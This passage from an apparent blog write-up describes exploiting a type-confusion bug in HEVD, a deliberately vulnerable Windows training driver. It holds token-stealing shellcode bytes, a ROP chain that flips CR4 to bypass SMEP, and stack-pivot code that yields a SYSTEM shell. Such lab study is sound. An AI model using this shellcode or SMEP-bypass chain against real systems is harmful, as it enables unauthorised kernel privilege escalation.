0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
int main() {
SMEPBypassInitializer();
exploit();
return 0;
}
After exploit executes, we have the follow WinDBG
output:
After mov esp, 0x48000000
instruction execution, we notice that it crashed and returned a segmentation fault as an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F)
, now let’s see our stack.
So, what can we do next?
Memory and Components
Now this blogpost can really start. After all briefing covering the techniques, it’s time to explain why stack is one of the most confuse
things in a exploitation development, we will see how it can easily turn a simple vulnerability attack into a brain-death issue.
Kernel Memory Management
Now, we’ll have to go deep into Memory Managment
topic as way to understand concepts about Memory Segments
, Virtual Allocation
, and Paging
.
According to Wikipedia
The kernel has full access to the system’s memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is
virtual addressing
, usually achieved bypaging
and/orsegmentation
. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtual address.
<…snip…>
In computing, a
virtual address space (VAS)
or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer’s instruction set architecture and supported by the operating system’s pointer size implementation, which can be4 bytes
for32-bit
or8 bytes
for64-bit
OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.
As we can see, Virtual Addressing
refers to the space addressed
for each user-application
and kernel functions
, reserving memory spaces during a OS usage. When an application is initialized, the operation system understand that needs to allocate new space in memory, addressing
into a valid range of addresses
, consequently avoiding damaging kernel current memory region.
That’s the case when you try toplay a game
, and for some reason, a bunch of GB’s from your current memory increases
before the game
starts, all data was allocated and most of this data
and addresses
initiates nullified
until game file-data
starts to be loaded into memory.
With the use of malloc()
and VirtualAlloc()
functions, you can actually “address” a range of Virtual Memory
into a defined address, that’s why Stack Pivoting
is the best solution for make this exploit works.
Virtual Memory
As you can see in the above image, Virtual Addresses
communicates to application/process
by sending data and values, so the processes can be able to query
, allocate
or free
each data any time.
As Wikipedia says:
In computing,
virtual memory
, orvirtual storage
,[b] is a memory management technique that provides an “idealizedabstraction
of the storage resources that are actually available on a given machine”[3] which “creates theillusion
to users of a very large (main) memory”.[4]The computer’s operating system, using a combination of
hardware
andsoftware
, maps memory addresses used by a program, calledvirtual addresses
, intophysical addresses
in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in theCPU
, often referred to as aMemory Management Unit (MMU)
, automatically translates virtual addresses to physical addresses.Software
within the operating system may extend these capabilities, utilizing, e.g.,disk storage
, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than isphysically
present in the computer.The primary benefits of virtual memory include
freeing
applications from having to manage ashared memory
space, ability to share memory used by librariesbetween
processes, increased security due to memory isolation, and being able to conceptually use more memory than might bephysically
available, using the technique ofpaging
orsegmentation
.
As mentioned before, addressing/allocating
Virtual Memory ranges (from a user-land
perspective), allow us to manipulate de usage of addresses data into our current application, but that’s a problem. When an address range of Virtual Memory
is allocated, still not part of OS physical operations
due the abstracted/fake
allocation into memory. Following the idea of our previous example, when a game
starts, Virtual Memory is allocated and Memory Management Unit (MMU)
automatically traslate data between physical
and virtual
addresses.
From a developer perspective, when an application consumes memory, it’s important to free()/VirtualFree()
unused data, to prevent
data won’t crash
the whole application, once so many addresses are set to be in use by the system. Also, OS can deal with processes which consumes many addresses, automatically closing this ones avoidingcritical errors
. There cases that applications exceed the capacity of RAM
free space, in this situations, the allocation can be extended into Disk Storage
.
Paged Memory
Physical memory also called Paged Memory
, imply to memory which is in use by applications and processes. This memory scheme can retrive
data from Virtual Allocations
, consequently utilizing it data as part of current
execution.
According to Wikipedia:
Memory Paging
In computer operating systems,
memory paging
(orswapping
on some Unix-like systems) is a memory management scheme by which a computer stores andretrieves
data fromsecondary storage
[a] for use inmain memory
.[citation needed] In this scheme, the operating system retrieves data from secondary storage insame-size blocks
calledpages
.Paging
is an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of availablephysical memory
.
Page faults
When a process tries to reference a page
not currently mapped
to apage frame
inRAM
, the processor treats thisinvalid memory reference
as apage fault
and transfers control from the program to the operating system.
Page Table
A
page table
is the data structure used by a virtual memory system in a computer operating system tostore
the mapping betweenvirtual addresses
andphysical addresses
. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by thehardware
, or more specifically, by theRandom-Access Memory (RAM)
subsystem. Thepage table
is a key component of virtual addresstranslation
that is necessary to access data in memory.
Kernel can identifies when an address lies in a Paged Memory
space by utilizing Page Table Entry (PTE)
, which differs each type of allocation and mapping memory segments.
With Page Table Entry (PTE)
, Kernel is able to map the correct offset in order to translate
data between each address. If there’s a invalid mapped memory region in the translations, a Page Fault
is returned, and OS crashes
. In case of Windows Kernel, a _KTRAP_FRAME
is called, and an error
should be expected as bellow:
Virtual Allocation issues in Windows System
When a binary exploit is developed, memory must to be manipulate in most of the cases. Through C/C++
functions as VirtualAlloc()
, if you manage to allocate data into address 0x48000000
with size 0x1000
, your current address 0x48000000
are now “addressed” into Page Table
as a Virtual Address
until 0x48001000
and it will NOT be treat as part of Physical Memory
by Kernel (remains as Non-Paged
one). It’s important to pay attention in this detail thus if you try to use the example above in a Kernel-Land
perspective, a Trap Frame
will be handled by WinDBG
as follows:
To deal with this issue, we can use VirtualLock()
function from C/C++
once it locks the specified region of the process’s virtual address space into physical memory, thus preveting Page Faults
. So, with that in mind, we can now changes our Virtual Memory Address
to a Physical
one.
Now should be possible to achieve code execution
, right?
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Again, the same error popped out even with address mapped into Physical Memory
.
Pain and Suffer due DoubleFaults
After million of tests, with different patterns of memory allocations, i’ve found a solution attempt. According to Martin Mielke and kristal-g, a reserved memory space should be used before the main allocation from address 0x48000000
.
When a Trap Frame
occur, we can clearly notice that lower addresses from 0x48000000
are used by stack
, and if these addresses keeps with unallocated
status, they can’t be used by current stack frame
.
As you can see, 0x47fffff70
is being utilized by ourstack frame
, but once we are starting the allocation from 0x48000000
address, it won’t be a valid one. To deal with this issue, a reservation
memory before 0x48000000
must be done.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>
Now we can actually allocate into 0x48000000–0x1000
address, finally allowing us to ignore DoubleFault
exception.
Let’s run our exploit again, it should works!
No matter how you give a try to manage memory, changing addresses or fill up stack
with data
hoping that works well, it will always catch
and returns an exception
even when your code seems to be correct. it took me a while 3 months
of rebooting my VM, and trying to change code to understand why it still happening.
Stack vs DATA
Let’s imagine stack frame
as a “big ball pit”, and there are located a bunch of data
, and when a new ball is “placed” in this space, all the others “changes” their location. That’s exatcly what happens when you tries to manipulate memory, changing current stack to an another one as mov esp, 0x48000000
does. When a modification of current stack frame is done, the same “believes” that current Physical Memory
are mapped
to another processes, and for some reason, you can actually see things like this after crash.
<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
After pollute Stack Frame
in a reserved space before Stack Pivoting offset
we can cleary notice that different addresses poped out into our current Stack Frame
, but our Trap Frame
still remains the same as before 0x47fffe70
. If we fill up all stack with 0x41
bytes, we’ll notice that some bytes will appear with different values as below:
<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
With this results in mind, we have some alternatives to considerate for this situation:
- Increase size of
reserved memory
space. - Try to find a fix to the
Stack Frame
due the situation we actually can’t reserve memory before Stack Pivoting space.
So, let’s give a try at first to increase the space of our reserved memory
<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
For some reason, after increased our reserved memory before mov esp, 0x48000000
, the whole kernel has crashed, and when 0x48000000
is moved into our current RSP
register, our stack frame
changes to the User Processes Context
due the size of address it self. That’s why i’ve mentioned before that stack seems to be a “Ball pit” sometimes, and after all, we still getting the same Trap Frame
exception.
No matter how you try to manipulate memory, it always will be caught and it will crash some application, after that, WinDBG
will handle it as an exception and BSOD
your system in a terrible horror movie.
Breakpoints??…. ooohh!…. Breakpoints!!!!
INT3
, a.k.a 0xCC
and breakpoints, can be defined as a signal
for any debbuger
to catch
and stop
an execution of attached processes
or a current development code. It can be performed by “clicking” into a debug option in some part of an IDE UI
or by insertingINT3
instruction directly into target process
through0xCC opcode
. So, in a WinDBG
command line, a command named bp still available to breakpoint
addresses as follow:
// Common Breakpoint, just stop into this address before it runs
bp 0x48000000
// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"
etc...
Also, it’s possible to enjoy the use of this mechanism to breakpoint
a shellcode
, and see if it code is running correctly during a exploitation development phase.
BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};
According to Wikipedia:
The
INT3
instruction is a one-byte-instruction defined for use by debuggers to temporarilyreplace
an instruction in a running program in order to set a codebreakpoint
. The more generalINT XXh
instructions are encoded using two bytes. This makes them unsuitable for use inpatching
instructions (which can be one byte long); seeSIGTRAP
.The opcode for
INT3
is0xCC
, as opposed to the opcode for INT immediate8, which is0xCD immediate8
. Since the dedicated0xCC
opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for anINT3
, assemblers do not normally generate the generic0xCD 0x03
opcode from mnemonics.
After an explanation about breakpoints
, it’s important to note that every previous tests are made withbreakpoints
in order to develop our exploit, but it’s time to forget it and skip all INT3
instructions.
Let’s give a try to re-run our exploit without the needing of breakpoint
a thing.
Kernel won’t crashes anymore, and system memory still intact!
Now shellcode
is being executed after our SMEP
bypass through theROP chain
and we’re now able to spawn a NT AUTHORITY\SYSTEM
shell.
BAAAM!! Finally!!!! aNT AUTHORITY\SYSTEM
shell after all!
Breakpoints…. HAHA!! BREAKPOINTS!
So, now we can pay attention that breakpoints
also can be a dangerous
thing into a exploitation development.
The explanation about this issue seems to be very simple. When WinDBG
debbuger catches
an exception
from kernel, Operation System
gets a signal that something went wrong occurred, but when a Stack Manipulation
is being doing, everything
that you do is an exception
. The Operation System
don’t understand that “an attacker is trying to manipulate Stack
”, he just catch
and reboot
it self because the Stack
are different from your current kernel context.
This headhache occurs likeStructured Exception Handling (SEH)
vulnerabilities, once when the set of breakpoints
and even a debbuger
into a process
, can cause crashes
or unitilization
of the same.
In my case, a away to pass through exception
is by ignoring all breakpoints
, and let kernel don’t reboot with a Non-Critical
exception.
Final Considerations
With this blogpost, i’ve learned alot of content that i didn’t knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days
to write about a thing which cost me 3 months
long! you should probably had 10 minutes
read, which is awesome and makes me happy too!
It’s important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM
shell.
Beware of Stack
and Breakpoints
, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly
.
Thanks to the people who helped me along all this way:
- First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all this months!
- @xct_de
- @gal_kristal
- @33y0re
Hope you enjoyed!
Exploit Link (not so important at all)
References
- https://www.coresecurity.com/sites/default/files/2020-06/Windows%20SMEP%20bypass%20U%20equals%20S_0.pdf
- https://kristal-g.github.io/2021/02/20/HEVD_Type_Confusion_Windows_10_RS5_x64.html
- https://ctf101.org/binary-exploitation/return-oriented-programming/
- https://j00ru.vexillium.org/2011/06/smep-what-is-it-and-how-to-beat-it-on-windows/
- https://www.abatchy.com/2018/01/kernel-exploitation-4
- https://vulndev.io/2022/07/14/windows-kernel-exploitation-hevd-x64-use-after-free/
- https://h0mbre.github.io/HEVD_Stackoverflow_SMEP_Bypass_64bit/
- https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/master/Driver/HEVD/Windows/TypeConfusion.c